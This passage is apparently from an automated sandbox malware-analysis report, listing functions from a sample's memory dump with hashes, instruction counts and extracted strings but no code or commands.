                                            • Instruction ID: 4205309130565c56965337825bbb91c569639673b354740c2d6d707f5f69642d
                                            • Opcode Fuzzy Hash: 06ecc31848c4b5403a9b64b26ab4e505c1bd3d6c07f2711eceadd413144134a5
                                            • Instruction Fuzzy Hash: 40917172940219BFEB21DF95CD85FAE7BB8EF54750F540059FB05AB190D674AD00CBA0
                                            Function 01A7E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 6a23c9bd5a8efad2cbe941e0c989a530c53c71e4e42d1c5988ada8caed50d0ca
                                            • Instruction ID: 60e90fe9d758792b3fa416e9c5736aa50b194bb528cf4ac296b577e9f2b4ba6a
                                            • Opcode Fuzzy Hash: 6a23c9bd5a8efad2cbe941e0c989a530c53c71e4e42d1c5988ada8caed50d0ca
                                            • Instruction Fuzzy Hash: 4D91BE72A00649BFDF22AFA5DD44FAFBBB9EF85750F140069F605A7250DB349A01CB90
                                            Function 01A0A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalTags
                                            • API String ID: 0-1106856819
                                            • Opcode ID: 9065b7485f0d4b2d2040b16a278cd2c3dce6873d17ea70e4f73baedf9abdb9cb
                                            • Instruction ID: 2897243c900cfb5e2a1d69ae3433555be05ed8d2b424ab63d1dd97d918fb9e51
                                            • Opcode Fuzzy Hash: 9065b7485f0d4b2d2040b16a278cd2c3dce6873d17ea70e4f73baedf9abdb9cb
                                            • Instruction Fuzzy Hash: DB718FB5E0020ADFEF29CF9CD9906EDBBB1BF99710F14812EE909A7241E7359941CB50
                                            Function 01A74978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .mui
                                            • API String ID: 0-1199573805
                                            • Opcode ID: 40bf2c64a227e55545135269000c2a3f1c9db0ea6d98b7525c019759d806b6a4
                                            • Instruction ID: 9812299e0537bf7a98e85511aba5e124bc0a88d060770ec97e880f0ffc043683
                                            • Opcode Fuzzy Hash: 40bf2c64a227e55545135269000c2a3f1c9db0ea6d98b7525c019759d806b6a4
                                            • Instruction Fuzzy Hash: 17517272D0022A9BDF11EF99DC40AAEBBB4FF58710F094169EA15BB250D7349E01CBE4
                                            Function 019EE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: EXT-
                                            • API String ID: 0-1948896318
                                            • Opcode ID: f0ea6edd983b6122dad3edd891999f38d1170ca3edf1ad360de6f7d7da73982d
                                            • Instruction ID: c9b137ac9be73ab93d8a3d0c1d7eacf22f998651300876488971972cd40af182
                                            • Opcode Fuzzy Hash: f0ea6edd983b6122dad3edd891999f38d1170ca3edf1ad360de6f7d7da73982d
                                            • Instruction Fuzzy Hash: CD41D072548312ABD712DA75D848B6BBBECAFC8B14F04092DFA8CD7140E675D904C796
                                            Function 01A4C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryHash
                                            • API String ID: 0-2202222882
                                            • Opcode ID: 787f70f6f79e91b6bbe01e801a67168aafecacc02a994b452db1fb17de01d67e
                                            • Instruction ID: c23cae4afea16a92b18a78c4bdf28d810a8542fcc40684d6eae516900ede83dc
                                            • Opcode Fuzzy Hash: 787f70f6f79e91b6bbe01e801a67168aafecacc02a994b452db1fb17de01d67e
                                            • Instruction Fuzzy Hash: 284133B1D0112DABEB21DB50CD84FDEB77DAB94724F0045A5EA0CAB144DB709E89CFA4
                                            Function 01A66B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #
                                            • API String ID: 0-1885708031
                                            • Opcode ID: 62adcddd4f9eeefa857418d29899899e069db5cfc7c027b79dc928188f3166fd
                                            • Instruction ID: 23e27d81f5a02533efed084efb27705eeade381df8c10d6754d4c8c3a68cb75c
                                            • Opcode Fuzzy Hash: 62adcddd4f9eeefa857418d29899899e069db5cfc7c027b79dc928188f3166fd
                                            • Instruction Fuzzy Hash: C8310831A00B199BEB22DF69C854BFE7BBCDF44704F144068EA49AB286D775E805CB90
                                            Function 01A5892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            Strings
                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01A5895E
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                            • API String ID: 0-702105204
                                            • Opcode ID: a10e8b3c455fbda0d9df1e65b1c62756ed6a4539babdb55f982ba7fc7033124c
                                            • Instruction ID: d662dc1093bf7f72a6557fa2a52ea1bccbe924fd0741b702e1d5de2e32f05d08
                                            • Opcode Fuzzy Hash: a10e8b3c455fbda0d9df1e65b1c62756ed6a4539babdb55f982ba7fc7033124c
                                            • Instruction Fuzzy Hash: C801F732308211EFE7605B5BCC84A66BFB6FFC5654F08001CFA4657151CB346841C792
                                            Function 01A72000 Relevance: .8, Instructions: 757COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba630873ac82f6c9088f72c746e3a3f9386aaced5c8ff770340ec5874617fcde
                                            • Instruction ID: f13da0d8570b8a8082f3775ac586b3586dd1cdcff84ce4084ef7bbb9f3a011c5
                                            • Opcode Fuzzy Hash: ba630873ac82f6c9088f72c746e3a3f9386aaced5c8ff770340ec5874617fcde
                                            • Instruction Fuzzy Hash: D042C5366083419BD726CF68CC90B6BBBE5BFC8700F08492EFA8697251D771DA45CB52
                                            Function 01A68158 Relevance: .6, Instructions: 617COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 881b27d872a166dd4045c5517e99b5a618d8aab945f09d5b01d2783686b4c2c5
                                            • Instruction ID: ba8342b5d6a6696e7de27273d905461276d5afeeaca585e857f4e6497445ab78
                                            • Opcode Fuzzy Hash: 881b27d872a166dd4045c5517e99b5a618d8aab945f09d5b01d2783686b4c2c5
                                            • Instruction Fuzzy Hash: 94423E75E103199FEB25CF69C841BADBBF9BF88300F148199E949EB242D7389985CF50
                                            Function 019E2840 Relevance: .6, Instructions: 605COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c973c439bcc59ce7016d0dc757a3478dc5c66544cdc4f0cf25010924f21f45f
                                            • Instruction ID: 1953b614f7e0ebe5ff63bdfc036260c54f620c72699e35a0023a420d8ad51ad3
                                            • Opcode Fuzzy Hash: 0c973c439bcc59ce7016d0dc757a3478dc5c66544cdc4f0cf25010924f21f45f
                                            • Instruction Fuzzy Hash: 8532DE70A00755ABDB26CF69C9447BEBBF2BFC8304F24411DE58A9B285D735AA42CB50
                                            Function 01A7A118 Relevance: .6, Instructions: 591COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a5e843fa3d0b7c5ee4910bd815ec22968a606f107513a27c433fa804b6a08a23
                                            • Instruction ID: 75cffad4c7fcd3d5812c83231221486c9a2ab1a9b76466552cbc3c0495f753e7
                                            • Opcode Fuzzy Hash: a5e843fa3d0b7c5ee4910bd815ec22968a606f107513a27c433fa804b6a08a23
                                            • Instruction Fuzzy Hash: 1E22C275204661AFEB25CF2DC89437ABBF1AF44300F0C8459E996CF286E735E652CB60
                                            Function 019D6A50 Relevance: .5, Instructions: 548COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f1cf0c65459932c2008bda73c7745763805440c946e09e896473a6531f05dbb2
                                            • Instruction ID: f2500f0269170a9ee6d2d2f841e5bdc022e53c35c23ea7fd3e4d0362742f8c03
                                            • Opcode Fuzzy Hash: f1cf0c65459932c2008bda73c7745763805440c946e09e896473a6531f05dbb2
                                            • Instruction Fuzzy Hash: 8532A175A05205CFDB25CFA8C580BAEBBF5FF88310F148569E95AAB391D734E841CB50
                                            Function 019F4A35 Relevance: .4, Instructions: 423COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                            • Instruction ID: 8fc20d029695aa070dce194fb2583b14438e8fcd5bd7b4ad6366e63c52a95aaa
                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                            • Instruction Fuzzy Hash: D1F16171E0021AABDB15CF99D580BBEBBF6AF84710F05812DEA09EB341D774E841CB60
                                            Function 01A6892B Relevance: .4, Instructions: 386COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a6e50123505259ad99f1e9b8adecf601d73d8d4d3dcfa5a3f1ac278733ff3645
                                            • Instruction ID: 2887c639dc75c91475377b6cb6cd276158e3f1848c03e287dd95758dc76a4f2c
                                            • Opcode Fuzzy Hash: a6e50123505259ad99f1e9b8adecf601d73d8d4d3dcfa5a3f1ac278733ff3645
                                            • Instruction Fuzzy Hash: ACD1F072A0070A8BDF15CF69C841ABEBBFDAF88304F198169D955E7241E739E9058B60
                                            Function 019D65D0 Relevance: .4, Instructions: 383COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ff033d17e2151a423226428848146cb58240e6aded6eb0a4ec9969371035d36
                                            • Instruction ID: d8fda79f20e77c4b43532bace20355fe5a9cc448c1a4273198d75b915ae00864
                                            • Opcode Fuzzy Hash: 6ff033d17e2151a423226428848146cb58240e6aded6eb0a4ec9969371035d36
                                            • Instruction Fuzzy Hash: 0CE16B71608342CFC715CF28C590A6ABBF5FF89314F058A6DE99987351EB31E905CB92
                                            Function 019C8397 Relevance: .4, Instructions: 380COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4943accc7790dad3dcdb2af334c5b9bd3d86fd4c188e32a74182c1edcebee406
                                            • Instruction ID: 9a2b9283e3fa4b3c0045fe69d87a2200c1b88f3b28fd2f84b318c40d372b2a38
                                            • Opcode Fuzzy Hash: 4943accc7790dad3dcdb2af334c5b9bd3d86fd4c188e32a74182c1edcebee406
                                            • Instruction Fuzzy Hash: A7D1E671A00216DBDB14DF68C890EBAB7E5FF94B04F04462DE95ADB280F734E951CB61
                                            Function 01A58243 Relevance: .3, Instructions: 322COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                            • Instruction ID: d6b4ddc92f837e5a3becab9ac1acd36df5ad05b4e36395698810f4f81bc91096
                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                            • Instruction Fuzzy Hash: 61B1B274A04705AFDB64DFAAC940AAFBFB9FF84344F10441DAE5297395DA38E906CB10
                                            Function 019E0535 Relevance: .3, Instructions: 300COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                            • Instruction ID: a09ca0b528a6f4a5fc371a7f195043dc046b738e4078cf7506427ad98d573404
                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                            • Instruction Fuzzy Hash: C6B106317046469FDB12DBA8C844BBEBBF6AF88700F284559F556DB281DB70ED41CB90
                                            Function 019D83C0 Relevance: .3, Instructions: 281COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 553759dcac8e8d5897a38154a2f0b446d4cf3f160507e332c7c674d2d8da210a
                                            • Instruction ID: ebe85d2e231bd047a65272b670492acf21547d566228da564c9447eb926e4467
                                            • Opcode Fuzzy Hash: 553759dcac8e8d5897a38154a2f0b446d4cf3f160507e332c7c674d2d8da210a
                                            • Instruction Fuzzy Hash: A4C148741083418FD764CF19C494BABB7E9FF88704F44896EE98987291D775E908CFA2
                                            Function 019CC427 Relevance: .3, Instructions: 280COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0fea61646d114f211ce7a93e36835239cc90b934e903a68080a4b0c971770eda
                                            • Instruction ID: c8e0f7b8dc6666d19e6edcd9b08c1a82557201dab0cdd64b5aebfc9a1896bfa3
                                            • Opcode Fuzzy Hash: 0fea61646d114f211ce7a93e36835239cc90b934e903a68080a4b0c971770eda
                                            • Instruction Fuzzy Hash: 1AB19070A042668BDB24CF68C990BA9B7B5EF54B10F0485EDD54EE7281EB30DDC5CB21
                                            Function 019FE5E7 Relevance: .3, Instructions: 278COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 19a0d0915c19174c092e04055fc12fae1dafa08ad9a6fe955a05e052501e5d9a
                                            • Instruction ID: 14bee264f0071b4f978c584792e922aa536b1499c4c04ece109917c38ab44501
                                            • Opcode Fuzzy Hash: 19a0d0915c19174c092e04055fc12fae1dafa08ad9a6fe955a05e052501e5d9a
                                            • Instruction Fuzzy Hash: D2A12931E00659AFEB22DB5CC944FAEBBB4BF44714F050129FB14AB2A1D7749D41CB92
                                            Function 01A10185 Relevance: .3, Instructions: 276COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b5944405cde9a8141393169d78a3e407c2c0bbcdabf8ed03f2e4d915fa8747f2
                                            • Instruction ID: a54e60607ffd3ebf7bcb7a1bb5465916b51aebea1c3cb0a73d739e1375d2b185
                                            • Opcode Fuzzy Hash: b5944405cde9a8141393169d78a3e407c2c0bbcdabf8ed03f2e4d915fa8747f2
                                            • Instruction Fuzzy Hash: 78A1D170B006169FDB25CF69CA90BABB7B5FF98314F044029FA45D7286DB34E852CB90
                                            Function 01AA4500 Relevance: .3, Instructions: 275COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 87a5b76253d6667c3ec747bd3b1d7526170a8c09406086d6b70d6c801b56ffe9
                                            • Instruction ID: e10a9d09c53ad98a6617bf54d0e8e283cf8a06cbcf0ca2654ea2bd5b8fcd9782
                                            • Opcode Fuzzy Hash: 87a5b76253d6667c3ec747bd3b1d7526170a8c09406086d6b70d6c801b56ffe9
                                            • Instruction Fuzzy Hash: 54A1CE72A04252AFD712DF18C980B2ABBE9FF8C704F89052CF5899B651D7B0ED01CB91
                                            Function 01AA2B57 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                            • Instruction ID: 5582c5cd86c53d5124f02dff1c9d04387b1d6d2328eb2b25e735a7f41d72df8e
                                            • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                            • Instruction Fuzzy Hash: 45B14A71E0061ADFDF29CFA9C880BADBBB5FF48310F54812AE914A7351D730A955CB90
                                            Function 01A560E0 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a440aec0d5e081b27f2d15a07cef7b3af4650369ac1aecb65ebfd9e6e80a049
                                            • Instruction ID: afe64292622271f3bc6320557f073bf89a036060759948f05058416fd42f29e6
                                            • Opcode Fuzzy Hash: 5a440aec0d5e081b27f2d15a07cef7b3af4650369ac1aecb65ebfd9e6e80a049
                                            • Instruction Fuzzy Hash: 5991D371E04216AFDF55CFA8D884BBEBFB5AF48710F554169EA18EB341D734E9008BA0
                                            Function 019EE3F0 Relevance: .3, Instructions: 261COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ca40553abef1d9fd49c41a831eab8e9c61669a7caeba1835dc06ea7ca53ae43
                                            • Instruction ID: 82386b751bfeac85992b9d23f52a0156d4ebcb1455a33b213581511f1ba9be99
                                            • Opcode Fuzzy Hash: 3ca40553abef1d9fd49c41a831eab8e9c61669a7caeba1835dc06ea7ca53ae43
                                            • Instruction Fuzzy Hash: 04914431A00616DBEB26DB68C488B7ABBE5EFC4B14F054469E90DDB380FA74DD01C791
                                            Function 01A26ACC Relevance: .2, Instructions: 226COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4591abe0bd31dc1fc4619a8555cf723f3ddfcfc3a04212092734f7dffc520616
                                            • Instruction ID: 8dbc516bf36cd701e915650e50ea7cfe2cb79b3d4c6cb8d0e90092f82793653e
                                            • Opcode Fuzzy Hash: 4591abe0bd31dc1fc4619a8555cf723f3ddfcfc3a04212092734f7dffc520616
                                            • Instruction Fuzzy Hash: 2E8184B1E016299BDB14DF6DC940ABEBBF9FB48700F14852EE849D7640E334D941CB94
                                            Function 01A9AB40 Relevance: .2, Instructions: 222COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                            • Instruction ID: 8e390340ec91e4544198e7bf19807f5355922f8560790a9454d83d3ccfff013d
                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                            • Instruction Fuzzy Hash: 3C817071A002599FDF19CF99C980ABEBBF2FF84310F18856AD9169B344D734EA85CB50
                                            Function 01A0E284 Relevance: .2, Instructions: 212COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eefff4a46ab35ec1e6e229c076e0ceb5df370b72d330a61cf630f5420072db21
                                            • Instruction ID: ad06d77e6462b1e2c1735eec83f23f28f001133aec1aa618d9a09c7ccfb7c0e4
                                            • Opcode Fuzzy Hash: eefff4a46ab35ec1e6e229c076e0ceb5df370b72d330a61cf630f5420072db21
                                            • Instruction Fuzzy Hash: 5C819D71A00609EFDB26CFA9D980BEEBBB9FF88314F144829E555A7250D730AC15DB60
                                            Function 019EC640 Relevance: .2, Instructions: 206COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7a884064221fc1a87e3a8f3817c35fd0c38d87547d1389c73af87b610eb97583
                                            • Instruction ID: e1eb8574a9c864cea624095c27f971d7f7e4f174c42d89185fe1c48892605d23
                                            • Opcode Fuzzy Hash: 7a884064221fc1a87e3a8f3817c35fd0c38d87547d1389c73af87b610eb97583
                                            • Instruction Fuzzy Hash: FF71BDB59012659FCB268F59C494BFEBBF5FF88710F14461AF986AB350D334A805CBA0
                                            Function 01A847A0 Relevance: .2, Instructions: 202COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 185678f5950f92b31449fdd852c70d5484ce6a49eaa2e4a0c06e68ceb3992913
                                            • Instruction ID: 150368248d0b5c100f3c41b5c179fe1205a84abf7004a6ebe8cd9cf8794e3f6e
                                            • Opcode Fuzzy Hash: 185678f5950f92b31449fdd852c70d5484ce6a49eaa2e4a0c06e68ceb3992913
                                            • Instruction Fuzzy Hash: FD71A0B4900206EFDB21EF99DA44B9AFBF8FF88700F15815AE608AB358D731C945CB54
                                            Function 019E260B Relevance: .2, Instructions: 201COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
